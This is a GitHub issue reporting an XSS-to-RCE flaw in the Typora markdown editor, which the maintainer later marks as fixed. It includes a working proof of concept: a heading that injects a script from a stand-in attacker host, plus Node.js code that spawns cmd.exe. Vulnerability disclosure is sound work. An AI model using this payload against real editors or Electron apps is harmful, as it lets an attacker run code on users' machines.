Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Typora XSS to RCE #2124

Closed
Li4n0 opened this issue Jan 24, 2019 · 1 comment
Closed

Typora XSS to RCE #2124

Li4n0 opened this issue Jan 24, 2019 · 1 comment
Labels

Comments

@Li4n0
Copy link

Li4n0 commented Jan 24, 2019

The filtering rules on the left outline bar are not perfect. It will cause XSS,when the document has the following content, and then could raise to RCE:
eg:

# 1
#  \<script src=https://hacker_s_url/xss.js\>\</script\> 
//xss.js 's content
var Process = process.binding('process_wrap').Process;
var proc = new Process();
proc.onexit = function (a, b) {};
var env = process.env;
var env_ = [];
for (var key in env) env_.push(key + '=' + env[key]);
proc.spawn({
    file: 'cmd.exe',
    args: ['/k netplwiz'],
    cwd: null,
    windowsVerbatimArguments: false,
    detached: false,
    envPairs: env_,
    stdio: [{
        type: 'ignore'
    }, {
        type: 'ignore'
    }, {
        type: 'ignore'
    }]
});

could execute cmd command.
3.png

the Linux and Mac version has the same problem.

@abnerlee abnerlee added the bug label Jan 24, 2019
@abnerlee
Copy link
Contributor

Fixed in new release

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

No branches or pull requests

2 participants